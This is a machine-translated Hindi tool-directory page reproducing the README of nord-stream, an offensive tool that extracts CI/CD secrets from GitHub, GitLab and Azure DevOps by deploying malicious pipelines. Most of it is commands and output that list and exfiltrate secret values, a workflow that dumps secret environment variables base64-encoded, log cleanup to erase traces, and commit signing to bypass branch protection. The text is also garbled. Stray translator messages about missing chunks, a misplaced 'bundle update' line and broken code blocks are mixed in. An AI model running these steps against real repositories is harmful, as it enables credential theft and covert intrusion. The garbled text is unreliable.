Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
nord-stream — नॉर्ड स्ट्रीम एक ऐसा टूल है जो आपको दुर्भावनापूर्ण पाइपलाइनों को तैनात करके CI/CD वातावरण के अंदर संग्रहीत रहस्यों (secrets) को निकालने की अनुमति देता है। यह वर्तमान में Azure DevOps, GitHub और GitLab का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/synacktiv/nord-stream
शोषणपहचान छुपाने के उपकरणडेटा निष्कासनजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगDevSecOpsसीक्रेट डिटेक्शनरेड टीमिंग
GitHubsynacktiv/nord-stream

nord-stream

नॉर्ड स्ट्रीम एक ऐसा टूल है जो आपको दुर्भावनापूर्ण पाइपलाइनों को तैनात करके CI/CD वातावरण के अंदर संग्रहीत रहस्यों (secrets) को निकालने की अनुमति देता है। यह वर्तमान में Azure DevOps, GitHub और GitLab का समर्थन करता है।

37022622 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
वेबसाइट
साझा करें

नॉर्ड स्ट्रीम

नॉर्ड स्ट्रीम एक ऐसा टूल है जो आपको CI/CD वातावरण में संग्रहीत सीक्रेट्स को दुर्भावनापूर्ण पाइपलाइनों को तैनात करके निकालने की अनुमति देता है।

यह वर्तमान में Azure DevOps, GitHub और GitLab का समर्थन करता है।

निम्नलिखित ब्लॉगपोस्ट में और अधिक जानें: https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks

विषय-सूची

  • नॉर्ड स्ट्रीम
    • विषय-सूची
    • स्थापना
    • उपयोग
      • साझा तर्क
        • टोकन का वर्णन करें
        • YAML बनाएं
        • YAML
        • लॉग साफ़ करें
        • कमिट पर हस्ताक्षर करना
      • Azure DevOps
        • सेवा कनेक्शन
          • SSH
        • ऑर्ग की सूची
        • सहायता
      • GitHub
        • सुरक्षाओं की सूची
        • सुरक्षाएं अक्षम करें
        • फोर्स
        • Azure OIDC
        • AWS OIDC
        • सहायता
      • GitLab
        • सीक्रेट्स की सूची
        • YAML
        • सुरक्षाओं की सूची
        • सहायता
    • TODO
    • संपर्क

स्थापना```

$ pipx install git+https://github.com/synacktiv/nord-stream

`git` भी आवश्यक है (देखें https://git-scm.com/download/) और इसे आपके `PATH` में मौजूद होना चाहिए।

## उपयोग

यहाँ GitHub पर एक सरल उदाहरण है; शुरुआत में, कोई विभिन्न गुप्त जानकारियों को सूचीबद्ध कर सकता है।```sh
$ nord-stream github --token "$GHP" --org org --list-secrets --repo repo
[*] Listing secrets:
[*] "org/repo" secrets
[*] Repo secrets:
        - REPO_SECRET
        - SUPER_SECRET
[*] PROD secrets:
        - PROD_SECRET

फिर एक्सफ़िल्ट्रेशन के लिए आगे बढ़ें:```sh $ nord-stream github --token "$GHP" --org org --repo repo
[+] "org/repo" [] No branch protection rule found on "dev_remote_ea5Eu/test/v1" branch [] Getting secrets from repo: "org/repo" [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] Secrets: secret_SUPER_SECRET=value for super secret secret_REPO_SECRET=repository secret

[] Getting secrets from environment: "PROD" (org/repo) [] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] Secrets: secret_PROD_SECRET=Value only accessible from prod environment

[] Cleaning logs. [] Check output: /home/hugov/Documents/pentest/RD/CICD/tools/nord-stream/nord-stream/nord-stream-logs/github

### साझा तर्क

कुछ तर्क [GitHub](#github), [Azure DevOps](#azure-devops) और [GitLab](#gitlab) के बीच साझा किए जाते हैं, यहाँ कुछ उदाहरण दिए गए हैं।

#### टोकन का वर्णन करें

`--describe-token` विकल्प का उपयोग आपके टोकन के बारे में सामान्य जानकारी प्रदर्शित करने के लिए किया जा सकता है:```bash
$ nord-stream github --token "$PAT" --describe-token
[*] Token information:
        - Login: CICD
        - IsAdmin: False
        - Id: 1337
        - Bio: None

बिल्ड YAML

--build-yaml विकल्प का उपयोग पाइपलाइन फ़ाइल बनाने के लिए किया जा सकता है, बिना इसे डिप्लॉय किए। यह संबंधित पाइपलाइन बनाने के लिए विभिन्न सीक्रेट नामों को प्राप्त करता है, जिसका उपयोग कस्टम चरण जोड़ने के लिए किया जा सकता है:```bash $ nord-stream github --token "$PAT" --org Synacktiv --repo repo --env PROD --build-yaml custom.yml [+] YAML file: name: GitHub Actions 'on': push jobs: init: runs-on: ubuntu-latest steps: - run: env -0 | awk -v RS='\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0 name: command env: secret_PROD_SECRET: ${{secrets.PROD_SECRET}} environment: PROD

#### YAML

कस्टम पाइपलाइन तैनात करने के लिए `--yaml` विकल्प का उपयोग किया जा सकता है:```yml
name: GitHub Actions
'on': push
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
    - run: echo "Hello from step 1"
      name: step 1
    - run: echo "Doing some important stuff here"
      name: command
    - run: echo "Hello from last step "
      name: last step

कोई इनपुट सामग्री प्रदान नहीं की गई है। कृपया अनुवाद के लिए चंक 13 की सामग्री भेजें।```bash $ nord-stream github --token "$PAT" --org Synacktiv --repo repo --yaml custom.yml [+] "synacktiv/repo" [] No branch protection rule found on "dev_remote_ea5Eu/test/v1"branch [] Running custom workflow: .../custom.yml [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] Workflow output: 2023-07-18T20:08:33.0073670Z ##[group]Run echo "Doing some important stuff here" 2023-07-18T20:08:33.0074247Z echo "Doing some important stuff here" 2023-07-18T20:08:33.0136846Z shell: /usr/bin/bash -e {0} 2023-07-18T20:08:33.0137261Z ##[endgroup] 2023-07-18T20:08:33.0422019Z Doing some important stuff here

[] Cleaning logs. [] Check output: .../nord-stream-logs/github

डिफ़ॉल्ट रूप से, यह `init` जॉब के `command` नामक कार्य का आउटपुट प्रदर्शित करेगा, लेकिन सब कुछ स्थानीय रूप से संग्रहीत है और मैन्युअल रूप से एक्सेस किया जा सकता है:```bash
$ cat nord-stream-logs/github/synacktiv/repo/workflow_custom_2023-07-18_22-08-44/init/4_last\ step.txt
2023-07-18T20:08:33.0458509Z ##[group]Run echo "Hello from last step "
2023-07-18T20:08:33.0459084Z echo "Hello from last step "
2023-07-18T20:08:33.0511473Z shell: /usr/bin/bash -e {0}
2023-07-18T20:08:33.0511890Z ##[endgroup]
2023-07-18T20:08:33.0597853Z Hello from last step

क्लीन लॉग

डिफ़ॉल्ट रूप से, Nord Stream पाइपलाइन तैनाती के बाद छोड़े गए निशानों को हटाने का प्रयास करेगा, जो आपके विशेषाधिकारों पर निर्भर करता है। निशानों को संरक्षित करने के लिए, --no-clean विकल्प का उपयोग किया जा सकता है। यह पाइपलाइन लॉग को रखेगा, लेकिन यह रिपॉजिटरी में किए गए परिवर्तनों को फिर भी वापस कर देगा। ध्यान दें कि GitLab के लिए, कुछ निशान हटाए नहीं जा सकते।

कमिट पर हस्ताक्षर करना

रिपॉजिटरी व्यवस्थापक किसी ब्रांच पर आवश्यक कमिट हस्ताक्षर (required commit signing) लागू कर सकते हैं ताकि सभी ऐसे कमिट को ब्लॉक किया जा सके जो हस्ताक्षरित और सत्यापित नहीं हैं। Nord Stream के साथ ऐसी सुरक्षा को बायपास करने के लिए कमिट पर हस्ताक्षर करना संभव है।

पहले SCM प्लेटफॉर्म पर अपनी GPG कुंजी बनाएं और आयात करें।```sh $ gpg --full-generate-key $ gpg --armor --export F94496913C43EFC5 $ gpg --list-secret-keys --keyid-format=long sec dsa2048/F94496913C43EFC5 2023-07-18 [SC] [expires: 2023-07-23] Key fingerprint = B158 3F43 9899 C5A3 B74E D04B F944 9691 3C43 EFC5 uid [ultimate] test-gpg [email protected]

The input section is empty — no source content was provided for chunk 19. Please supply the Markdown text to translate.```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main  --key-id F94496913C43EFC5 --user test-gpg --email [email protected] --force
[*] Using branch: "main"
[+] "synacktiv/repo"
[*] Getting secrets from environment: "prod" (synacktiv/repo)
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
secret_PROD_SECRET=my PROD_SECRET

निर्भरताएँ अपडेट करें

bundle update```bash $ git verify-commit 00dcd856624bc9a41f8bd70662f0650839730973 gpg: Signature made Tue 18 Jul 2023 10:34:18 PM CEST gpg: using DSA key B1583F439899C5A3B74ED04BF94496913C43EFC5 gpg: Good signature from "test-gpg [email protected]" [ultimate] Primary key fingerprint: B158 3F43 9899 C5A3 B74E D04B F944 9691 3C43 EFC5

### Azure DevOps

Nord Stream निम्नलिखित प्रकार के गुप्त (secrets) निकाल सकता है:
- वेरिएबल समूह (vg)
- सुरक्षित फ़ाइलें (sf)
- सेवा कनेक्शन

#### सेवा कनेक्शन

Azure DevOps किसी जॉब में कार्य निष्पादित करने के लिए बाहरी और दूरस्थ सेवाओं के साथ कनेक्शन बनाने की सुविधा प्रदान करता है। इसके लिए सेवा कनेक्शन का उपयोग किया जाता है। एक सेवा कनेक्शन किसी दूरस्थ सेवा के लिए एक पहचान के क्रेडेंशियल रखता है। Azure DevOps में कई प्रकार के सेवा कनेक्शन होते हैं।
टूल डाउनलोड करें